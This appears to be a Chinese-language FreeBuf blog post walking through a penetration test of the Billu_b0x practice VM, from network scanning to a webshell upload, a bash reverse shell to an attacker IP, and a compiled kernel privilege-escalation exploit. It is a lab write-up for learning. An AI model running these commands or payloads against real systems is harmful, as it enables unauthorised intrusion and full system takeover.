freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

靶场渗透之Billu_b0x
Shorge 2022-10-18 13:42:39 124865
所属地 河南

信息收集

1.扫描主机

arp-scan-l (-l从网络接口配置生成地址)

1665899812_634b9d247f3c2093e87bb.png!small?1665899812142

可以根据靶机的mac地址来确定具体的ip为192.168.23.4

1665899836_634b9d3c989327d962a7c.png!small?1665899836032

2.扫描开放端口

nmap -PR 192.168.23.4

1665900047_634b9e0fecce3c14a8670.png!small?1665900047352

开放了80和22端口。说明可以远程连接,也有web服务

3.扫描目录

dirsearch -u 192.168.23.4

1665998306_634d1de267b114b6d595b.png!small?1665998306786


方式一

根据上步发现的22端口,拿到账号密码就可以登陆。

1665999447_634d22570023655c1ecaf.png!small?1665999447487

扫描目录出来phpmy,一般数据库默认文件会放在config.inc.php,对此可以进行路径的组合。

通过对发现的目录进行打开测试。在test下可以进行路径参数传递。

1665999713_634d2361454632bab0ba9.png!small?1665999713616

进行传参,同时要改为post传参

1665999743_634d237f64e9e3af1971f.png!small?1665999744052

获得密码后登陆即可

1666000028_634d249ccb369c4dc2f7a.png!small?1666000029129

方式二

1.获取数据库账号密码

还是在test页面看是否能下载文件

1666000141_634d250d40d297467a409.png!small?1666000141682

可以下载下来,同时可以任意下载,将目录中的文件下来出来后发现只有c.php存在账户密码

1666000179_634d25337a69927c5f5fe.png!small?1666000179825

登陆phpmy可以得到前台的登陆密码

1666000200_634d2548d3a8a32a083eb.png!small?1666000201234

成功的登陆进去网站

1666000224_634d25605e492f8ed2286.png!small?1666000225262

2.漏洞利用点

发现可以上传的功能点

1666000264_634d25883c92abaefb8b9.png!small?1666000264739

根据text下,下载出来网页的源码可以发现限制了文件的后缀名。

1666000408_634d261817792009b77f3.png!small?1666000408572

传入图片并加入木马

1666000834_634d27c2b6fc91ca3d3f5.png!small?1666000835237


1666070515_634e37f3ac925a22afdbc.png!small?1666070515201

continue这里可以执行文件,需要在post后加入相应指令

1666070649_634e38790e151ede433d0.png!small?1666070648517

进行反弹shell

1666070833_634e3931c49f30eeaf3b2.png!small?1666070833360

需要改为url编码

echo "bash -i >& /dev/tcp/192.168.23.2/6666 0>&1" | bash

之后在kali中进行监听。

提权

用python建立交互:python -c 'import pty;pty.spawn("/bin/bash")'

查看内核和版本号:uname -a        cat /etc/issue1666071232_634e3ac0cb00009e30e6e.png!small?1666071232114

1666071246_634e3aced0f8d04ad47b2.png!small?1666071246145

在kali下查询对应版本的exp

1666071266_634e3ae240fae31c3b4ca.png!small?1666071265678

将其下载下来,并执行

gcc -pthread 37292.c -o 37292 -lcrypt
./37292

拿下权限

1666071313_634e3b1134f2c9aca17a5.png!small?1666071312477


# web安全 # 内网渗透
本文为 Shorge 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Shorge LV.1
这家伙太懒了,还未填写个人描述!
  • 1 文章数
  • 1 关注者
文章目录